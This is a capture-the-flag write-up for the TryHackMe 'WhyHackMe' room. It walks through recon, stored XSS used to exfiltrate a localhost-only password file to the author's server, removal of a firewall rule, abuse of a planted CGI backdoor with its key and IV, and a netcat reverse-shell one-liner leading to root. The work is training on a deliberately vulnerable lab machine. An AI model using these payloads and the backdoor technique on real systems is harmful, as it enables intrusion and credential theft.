WhyHackMe

Dive into the depths of security and analysis with WhyHackMe.

TryHackMe | WhyHackMeTryHackMe

Recon

First we start with nmap scans.

┌──(kali㉿kali)-[~]
└─$ nmap -p- whyhackme.thm -v    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-10 00:52 EST
Initiating Ping Scan at 00:52
Scanning whyhackme.thm (10.10.144.197) [2 ports]
Completed Ping Scan at 00:52, 0.17s elapsed (1 total hosts)
Initiating Connect Scan at 00:52
Scanning whyhackme.thm (10.10.144.197) [65535 ports]
Discovered open port 22/tcp on 10.10.144.197
Discovered open port 21/tcp on 10.10.144.197
Discovered open port 80/tcp on 10.10.144.197
Connect Scan Timing: About 5.94% done; ETC: 01:01 (0:08:11 remaining)
Completed Connect Scan at 01:03, 635.16s elapsed (65535 total ports)
Nmap scan report for whyhackme.thm (10.10.144.197)
Host is up (0.17s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
21/tcp    open     ftp
22/tcp    open     ssh
80/tcp    open     http
41312/tcp filtered unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 635.40 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -sT -sV -sC -p 21,22,80 whyhackme.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-10 00:53 EST
Nmap scan report for whyhackme.thm (10.10.144.197)
Host is up (0.16s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.17.15.155
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             318 Mar 14  2023 update.txt
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 47:71:2b:90:7d:89:b8:e9:b4:6a:76:c1:50:49:43:cf (RSA)
|   256 cb:29:97:dc:fd:85:d9:ea:f8:84:98:0b:66:10:5e:6f (ECDSA)
|_  256 12:3f:38:92:a7:ba:7f:da:a7:18:4f:0d:ff:56:c1:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome!!
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.50 seconds

We can see see Anonymous FTP login is allowed. Let's try logging in.

┌──(kali㉿kali)-[~]
└─$ ftp whyhackme.thm
Connected to whyhackme.thm.
220 (vsFTPd 3.0.3)
Name (whyhackme.thm:kali): anonymous    
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||32050|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             318 Mar 14  2023 update.txt
226 Directory send OK.
ftp> get update.txt
local: update.txt remote: update.txt
229 Entering Extended Passive Mode (|||64421|)
150 Opening BINARY mode data connection for update.txt (318 bytes).
100% |*****************************************|   318        5.76 KiB/s    00:00 ETA
226 Transfer complete.
318 bytes received in 00:00 (1.54 KiB/s)
ftp> exit

We find the file update.txt.

┌──(kali㉿kali)-[~]
└─$ cat update.txt   
Hey I just removed the old user mike because that account was compromised and for any of you who wants the creds of new account visit 127.0.0.1/dir/pass.txt and don't worry this file is only accessible by localhost(127.0.0.1), so nobody else can view it except me or people with access to the common account. 
- admin

This seems interesting, should be useful later.

Upon visiting the website we are met with this page.

The blog.php opens a blog with random text and at the bottom there is a link for a login page.

admin:admin does not work.

Dirbuster shows that there is a registration page called register.php

┌──(kali㉿kali)-[~]
└─$ dirbuster 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: /dir/ - 403
Dir found: /assets/ - 200
Dir found: / - 200
Dir found: /cgi-bin/ - 403
File found: /index.php - 200
File found: /assets/login.css - 200
File found: /assets/style.css - 200
File found: /blog.php - 200
File found: /login.php - 200
Dir found: /icons/ - 403
File found: /register.php - 200
Dir found: /icons/small/ - 403
File found: /logout.php - 302
File found: /config.php - 200
DirBuster Stopped

We can access this registration page.

It is not possible to get admin access by creating an account with the same name as Admin.

After creating an account and logging in, We are able to post comments. But as you can see while trying for XXS nothing works. Upon inspecting the element we find out comments under <h2> HTML tag but closing the tag first and then trying scrip did not work either.

Initial Access

Since even the name is displayed, let's try creating a new user with <script>alert("2");</script> as the name.

Here we have stored XXS. Let's try accessing 127.0.0.1/dir/pass.txt.

After alot of trial and error. This walkthrough helped me in getting the content pass.txt. It is important you delete all your previous comments. If even that does not work then it would be better to reset the machine and then try it. This solved it for me.

WhyHackMeWriteups

┌──(kali㉿kali)-[~/Desktop/THM/whyhackme]
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.17.15.155 - - [10/Jan/2024 04:39:28] "GET /exfil.js HTTP/1.1" 200 -
10.17.15.155 - - [10/Jan/2024 04:39:30] "GET /exfil.js HTTP/1.1" 304 -
10.17.15.155 - - [10/Jan/2024 04:39:30] code 404, message File not found
10.17.15.155 - - [10/Jan/2024 04:39:30] "GET /exfil/LAST/[REDACTED]jpg HTTP/1.1" 404

We see the content of pass.txt in base64 encoded we just need to decode it.

┌──(kali㉿kali)-[~]
└─$ echo "[REDACTED]" | base64 -d       
jack:[PASSWORD]

We have a username called jack and a password. Let's SSH with the details.

┌──(kali㉿kali)-[~]
└─$ ssh jack@whyhackme.thm     
The authenticity of host 'whyhackme.thm (10.10.69.161)' can't be established.
ED25519 key fingerprint is SHA256:4vHbB54RGaVtO3RXlzRq50QWtP3O7aQcnFQiVMyKot0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'whyhackme.thm' (ED25519) to the list of known hosts.
jack@whyhackme.thm's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-144-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 10 Jan 2024 09:54:49 AM UTC

  System load:  0.36               Processes:             128
  Usage of /:   72.0% of 11.21GB   Users logged in:       0
  Memory usage: 32%                IPv4 address for eth0: 10.10.69.161
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

181 updates can be applied immediately.
122 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Sep  5 13:50:13 2023

jack@ubuntu:~$ ls
user.txt
jack@ubuntu:~$ cat user.txt 
[REDACTED]
jack@ubuntu:~$ 

Here we have our first flag.

Privelege Esclation

jack@ubuntu:~$ cd ..
jack@ubuntu:/home$ ls
jack
jack@ubuntu:/home$ cd ..
jack@ubuntu:/$ ls
bin  boot  dev  etc  home  lib  lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  swap.img  sys  tmp  usr  var
jack@ubuntu:/$ cd usr
jack@ubuntu:/usr$ ls
bin  games  include  lib  lib32  lib64  libexec  libx32  local  sbin  share  src
jack@ubuntu:/usr$ cd ..
jack@ubuntu:/$ cd opt
jack@ubuntu:/opt$ ls
capture.pcap  urgent.txt
jack@ubuntu:/opt$ cat urgent.txt 
Hey guys, after the hack some files have been placed in /usr/lib/cgi-bin/ and when I try to remove them, they wont, even though I am root. Please go through the pcap file in /opt and help me fix the server. And I temporarily blocked the attackers access to the backdoor by using iptables rules. The cleanup of the server is still incomplete I need to start by deleting these files first.

With little moving around we find urget.txt which tells us there are some files in /usr/lib/cgi-bin/ and that we can use iptables as root. Upon trying to access the said files in the location we get Permission denied.

There is also a pcap file, which is encrypted.

After quite some time and trial and error, Referring back to the earlier walkthrough. We can decrypt this as follows:

Decrypting SSL/TLS traffic using Wireshark and private keys

1. Open the Preferences window by navigation to Edit > Preferences.

2. Expand Protocols and click TLS.

3. To specify the RSA private key, click Edit > New and enter the following information:

   • IP address: The IP address of the SSL server. (10.133.71.33 here)

   • Port: The port number. (41312 here)

   • Protocol: A protocol name for the decrypted network data. (tcp here)

   • Key File: Path to the RSA private key.

4. Click Close.

To find the Key file, the 000-default.conf can be examined. The key can be found in /etc/apache2/certs/

We can setup a python server and request the key and add it to wireshark. We can apply http as a filter and browse through the .pcap.

We know the port to focus on is 41312. But the initial nmap scans did not show this port as open. Checking again confirmed it.

Using iptables we can check what's allowed and what's blocked.It is port 41312. Ok.

sudo /usr/sbin/iptables -L --line-numbers

jack@ubuntu:/$ sudo /usr/sbin/iptables -L --line-numbers
[sudo] password for jack: 
Chain INPUT (policy ACCEPT)
num  target     prot opt source   destination         
1    DROP       tcp  --  anywhere anywhere         tcp dpt:41312
2    ACCEPT     all  --  anywhere anywhere            
3    ACCEPT     all  --  anywhere anywhere         ctstate NEW,RELATED,ESTABLISHED
4    ACCEPT     tcp  --  anywhere anywhere         tcp dpt:ssh
5    ACCEPT     tcp  --  anywhere anywhere         tcp dpt:http
6    ACCEPT     icmp --  anywhere anywhere         icmp echo-request
7    ACCEPT     icmp --  anywhere anywhere         icmp echo-reply
8    DROP       all  --  anywhere anywhere            

Chain FORWARD (policy ACCEPT)
num  target     prot opt source   destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source   destination         
1    ACCEPT     all  --  anywhere anywhere            
jack@ubuntu:/$ 

We can see that there is a rule to drop tcp on port 41312.

Let's delete this rule and add a rule to accept traffic.

sudo /usr/sbin/iptables -D INPUT 1

This will delete rule 1. i.e 1 DROP tcp -- anywhere anywhere tcp dpt:41312.

sudo /usr/sbin/iptables -I INPUT -p tcp --dport 41312 -j ACCEPT

This will add the new rule to accept traffic. We can confirm with nmap

┌──(kali㉿kali)-[~/Desktop/THM/whyhackme]
└─$ nmap -sT -sV -p 41312 whyhackme.thm 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-10 06:10 EST
Nmap scan report for whyhackme.thm (10.10.69.161)
Host is up (0.19s latency).

PORT      STATE SERVICE VERSION
41312/tcp open  http    Apache httpd 2.4.41
Service Info: Host: www.example.com

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds

We can see that it open.

When trying to access, it tells us to use HTTPS instead.

But that just tells us we don't have permission. However from the wireshark details earlier we know we can access this port

https://whyhackme.thm:41312/cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id

Checking sudo -l

We can see that we can run everything as sudo, let's see if we can access root flag.

https://whyhackme.thm:41312/cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=sudo+cat+/root/root.txt

This gives us the flag. Although I am sure this was not the intended way to get the flag.

Let's try getting a shell as root. Setup a listner with nc -lvnp 1337.

curl -k -s 'https://localhost:41312/cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN' --data-urlencode cmd='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.15.155 1337 >/tmp/f'

Execute the above command as jack.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1337                      
listening on [any] 1337 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.69.161] 54572
bash: cannot set terminal process group (823): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$ whoami
whoami
www-data
www-data@ubuntu:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: ALL
www-data@ubuntu:/usr/lib/cgi-bin$ sudo su
root@ubuntu:/usr/lib/cgi-bin# whoami
root
root@ubuntu:/usr/lib/cgi-bin# 

We have root. We can directly get our flag now

root@ubuntu:/usr/lib/cgi-bin# cd /root
root@ubuntu:~# ls
bot.py  root.txt  snap
root@ubuntu:~# cat root.txt
[REDACTED]
root@ubuntu:~#